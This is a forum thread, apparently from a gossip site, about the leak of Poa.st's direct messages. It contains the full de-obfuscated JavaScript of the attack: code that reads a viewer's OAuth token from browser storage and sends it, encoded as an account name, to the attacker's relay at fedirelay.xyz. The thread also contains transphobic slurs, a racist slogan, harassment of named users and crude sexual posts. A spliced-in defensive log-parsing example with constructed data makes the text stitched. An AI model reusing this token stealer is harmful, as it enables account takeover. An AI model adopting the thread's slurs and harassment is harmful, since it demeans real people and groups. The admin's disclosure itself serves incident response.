Poa.st / Chudbuds.lol General Discussion Thread - !! Poa.st and Bae.st have been compromised, all direct messages have been leaked. !!

Finally. Undeniable proof that the troons attacking the farms are just antisemitic.

joshlovesIS.PNG
 
Isn't it the way we were attacked last year? I mean, through a script disguised as some non-executable file, used as an attachment and then executed once it was uploaded.
Say, wasn't that also when the hackers changed everybody's PFPs to the Poast logo in an obvious attempt to frame them? 🤔🤔🤔
 
ftfy


Isn't it the way we were attacked last year? I mean, through a script disguised as some non-executable file, used as an attachment and then executed once it was uploaded.
I think a similar attack was executed in 2019, and we all had our IP addresses leaked.
 
Surprisingly, there seem to be quite a few ladies on Poast. Moids, let's see what your future based tradwife might look like:

Bachelorette #1 has spent a decade searching for the perfect racist sex pervert to call her husband:

loveonpoast1.PNG

loveonpoast2.PNG

Bachelorette #2 only requires that you pass the high bar of being less autistic about reading signals than Flamenco (FLAMENCO!):

loveonpoast3.PNG

Bachelorette #3 is a pedophile

poastscience.PNG

I left Elaine off because while I expected funny shit of her acting as tard commander of a legion of simps, psycho Poast people treated her like the resident autistic to torment and it was honestly pretty sad to read.

Though I did laugh at this (re: Null)
poastwizard.PNG

Finally, I realized after all this time who graf reminds me of:

graf.png

boc.png
 
I just read all the Wormwood logs, turns out he's just a great guy. I like him even more now.
Nothing that interesting, but here are a few chunks of deep Wormwood lore for those interested.

1685064850189.png

Punished Wormwood. Condemned to make racist comics online until death ensues.

1685065269848.png

Special kid Wormwood, they tried to contain his Vril ever since childhood.

1685065455351.png

No one knows how to behave around Graf it seems.

1685066948464.png

TND

1685067186086.png

Based Wormwood, keeping good OpSec even with whamen.

1685067906650.png

Based Wormwood, refusing pornography even when offered directly.

1685068080670.png

Based Wormwood, refusing pornography even when it's... uh... homosexual.

1685068221657.png

We've all been there fren. Reminder to homeschool your children.
 
Graf explains what happened
1685069841167.png
1685069864444.png
1685069917623.png
anime graf mays 🛰️🪐
@graf

hey friends,

on may 19, 2023 an unknown user registered the domain name fedirelay.xyz and set up a fake mostr (nostr) relay to listen for requests on the fediverse.

on may 20, 2023 at 20:52 (utc) a user uploaded the attached document to poast. it was originally an obfuscated javascript file (unobfuscated and attached it here, renamed to .txt so you can view it in any editor).

what this javascript file does is take the viewer's oauth token, encode it to make it look like a nostr pubkey and then force the clandestine mostr relay to look up that user locally, giving that server the encoded token, all while appearing to be a legitimate mostr (nostr) bridge

i have taken steps to completely limit access to the admin api and corrected any CSP or other issues that could possibly have contributed to this, however most of you (instance owners) are still vulnerable to it. the default pleroma install serves media files on your root domain as a local folder (i.e. yourdomain.xyz/media) and the default CSP for any site is to allow executing scripts via the root domain. in order to prevent this you should take steps to either move your media from yourdomain.xyz/media to media.yourdomain.xyz (or any subdomain outside of your root domain) or perhaps by limiting the CSP for that subdirectory via nginx configuration.

if you are an instance owner, the obfuscated file hash is `b2977f2d97f598d2ebd6dcf37afd9047b5da2b6dc95a7b2824fb111c906fb117` so you can search yourdomain.xyz/media/b2977f2d97f598d2ebd6dcf37afd9047b5da2b6dc95a7b2824fb111c906fb117.js and see if you have it on your server.

no user password or anything beyond email:user and your chats and media associated with them have been archived and everybody's tokens were dropped forcing you to all relog on your accounts. this is to ensure that if any of you had tokens exposed by viewing this JavaScript, they are no longer functional on poast.

sorry to anybody i let down but i could never have foreseen this level of sophistication and i would not have ever expected it. now that we are aware of it, we will be more diligent in the future. thanks for being here with us still friends

```javascript
async function send(token, userToken, lastLoginName) {
  // CRC-32 lookup table (polynomial 0xEDB88320)
  function generateTable() {
    var temp,
      table = [];
    for (var i = 0; i < 256; i++) {
      temp = i;
      for (var j = 0; j < 8; j++) {
        temp = temp & 1 ? 3988292384 ^ (temp >>> 1) : temp >>> 1;
      }
      table[i] = temp;
    }
    return table;
  }

  // CRC-32 of the string, returned as lowercase hex
  function hash(str) {
    var table = generateTable(),
      result = 0 ^ -1;
    for (var i = 0; i < str.length; i++) {
      result = (result >>> 8) ^ table[(result ^ str.charCodeAt(i)) & 255];
    }
    return ((result ^ -1) >>> 0).toString(16);
  }

  // Hex-encode the token and append 4 hex digits of the login name's CRC-32
  let acct = token
    .split('')
    .map((char) => char.charCodeAt(0).toString(16).padStart(2, '0'))
    .join('') + hash(lastLoginName).slice(0, 4);

  // Make the viewer's own instance resolve the fake account on the relay
  await fetch(
    'https://' +
      window.location.hostname +
      '/api/v1/accounts/lookup?acct=' +
      acct +
      '%40mostr.fedirelay.xyz',
    {
      credentials: 'include',
      headers: {
        Accept: 'application/json',
        'Accept-Language': 'en-US,en;q=0.5',
        'Content-Type': 'application/json',
        Authorization: 'Bearer ' + userToken,
        'Sec-Fetch-Dest': 'empty',
        'Sec-Fetch-Mode': 'cors',
        'Sec-Fetch-Site': 'same-origin',
      },
      referrer: 'https://' +
        window.location.hostname +
        '/' +
        acct +
        '@' +
        window.location.hostname,
      method: 'GET',
      mode: 'cors',
    },
  );

  await fetch(
    'https://' +
      window.location.hostname +
      '/api/v1/accounts/' +
      acct +
      '@mostr.fedirelay.xyz',
    {
      credentials: 'include',
      headers: {
        Accept: 'application/json',
        'Accept-Language': 'en-US,en;q=0.5',
        'Content-Type': 'application/json',
        Authorization: 'Bearer ' + userToken,
        'Sec-Fetch-Dest': 'empty',
        'Sec-Fetch-Mode': 'cors',
        'Sec-Fetch-Site': 'same-origin',
      },
      referrer: 'https://' +
        window.location.hostname +
        '/' +
        acct +
        '@' +
        window.location.hostname,
      method: 'GET',
      mode: 'cors',
    },
  );
}

(async function () {
  // Read the frontend's persisted state from localStorage
  let auth = JSON.parse(localStorage.getItem('localforage/vuex-lz'));

  // Fall back to the IndexedDB copy when localStorage has none
  if (auth == undefined) {
    const openRequest = window.indexedDB.open('localforage', 2);

    openRequest.onsuccess = async (e) => {
      let db = openRequest.result;
      const transaction = db.transaction(['keyvaluepairs'], 'readwrite');
      let keyvaluepairs = transaction.objectStore('keyvaluepairs');
      let request = keyvaluepairs.get('vuex-lz');

      request.onsuccess = async (e) => {
        auth = request.result;
        let lastLoginName = auth?.users?.lastLoginName;
        let userToken = auth?.oauth?.userToken;
        let token = '';
        token += auth?.oauth?.userToken;
        await send(token, userToken, lastLoginName);
      };
    };

    return;
  }

  let lastLoginName = auth?.users?.lastLoginName;
  let userToken = auth?.oauth?.userToken;

  let token = '';
  token += auth?.oauth?.userToken;

  await send(token, userToken, lastLoginName);
})();
```


His responses to people's responses
1685070131161.png
1685070209115.png
1685070243996.png
1685070328301.png
1685070086736.png
1685070328301.png

long thread of somewhat cope/schizo poasts
1685070492516.png
1685070525219.png
1685070552294.png
1685070591575.png
 

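Added example, not part of graf's post or the attached file: a log-triage helper for instance owners that finds the account lookups the script makes against mostr.fedirelay.xyz and decodes each `acct` value back into the token that needs revoking. The log lines, tokens and user names are constructed, the function names are hypothetical, and it assumes the script's `hash()` is standard CRC-32 (table filled with `table[i] = temp`).

```javascript
// Added example (not from the thread): find the exfiltration lookups in access logs.
// SAMPLE_LOG, its tokens and the user names are constructed test data.
const EXFIL_RE = /\/api\/v1\/accounts\/(?:lookup\?acct=)?([0-9a-f]+)(?:%40|@)mostr\.fedirelay\.xyz/i;

// Standard CRC-32, polynomial 0xEDB88320 (3988292384), low byte of each char code.
function crc32hex(str) {
  let crc = -1;
  for (let i = 0; i < str.length; i++) {
    crc ^= str.charCodeAt(i) & 255;
    for (let j = 0; j < 8; j++) crc = crc & 1 ? (crc >>> 1) ^ 0xedb88320 : crc >>> 1;
  }
  return ((crc ^ -1) >>> 0).toString(16);
}

// acct = hex(token chars) + first 4 hex digits of crc32(lastLoginName).
// Assumes a 4-digit tag; a CRC below 0x1000 would yield a shorter one.
function decodeAcct(hex) {
  const pairs = hex.slice(0, -4).match(/../g) || [];
  return {
    token: pairs.map((b) => String.fromCharCode(parseInt(b, 16))).join(''),
    tag: hex.slice(-4),
  };
}

// Returns one entry per distinct leaked token, with the local names whose CRC tag matches.
function findExfil(logLines, knownUsers = []) {
  const byToken = new Map();
  for (const line of logLines) {
    const m = EXFIL_RE.exec(line);
    if (!m) continue;
    const { token, tag } = decodeAcct(m[1].toLowerCase());
    const hit = byToken.get(token) ||
      { token, requests: 0, users: knownUsers.filter((u) => crc32hex(u).slice(0, 4) === tag) };
    hit.requests += 1;
    byToken.set(token, hit);
  }
  return [...byToken.values()];
}

const SAMPLE_LOG = [
  '203.0.113.7 - - [20/May/2023:21:03:11 +0000] "GET /api/v1/accounts/lookup?acct=54455354544f4b454e3610%40mostr.fedirelay.xyz HTTP/2.0" 200 512',
  '203.0.113.7 - - [20/May/2023:21:03:12 +0000] "GET /api/v1/accounts/54455354544f4b454e3610@mostr.fedirelay.xyz HTTP/2.0" 404 31',
  '198.51.100.9 - - [20/May/2023:21:10:40 +0000] "GET /api/v1/accounts/616263313233e8b7@mostr.fedirelay.xyz HTTP/2.0" 404 31',
  '198.51.100.9 - - [20/May/2023:21:11:02 +0000] "GET /api/v1/accounts/lookup?acct=alice%40example.org HTTP/2.0" 200 498',
];

console.log(findExfil(SAMPLE_LOG, ['hello', 'a', '123456789']));
```

The 4-digit tag only narrows the account down, so treat `users` as candidates and revoke every decoded token regardless of whether a name matches.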
Does thirsting for rabies pussy classify you as a bug chaser?

My mans trying to get pozzed
Weird thing, rabies gives men epic priapism. Just a raging hard on. A good novel on the subject is Rant, by Chuck Palahniuk, same dude that did Fight Club. Nice story about time travel, rape, incest and inbreeding, and of course, fucking on rabies. All the nice, heartwarming themes one would expect from a writer from Portland.

Anyhow, got off topic there. Bug Chasers are degenerates and deserve the inquisition treatment.
 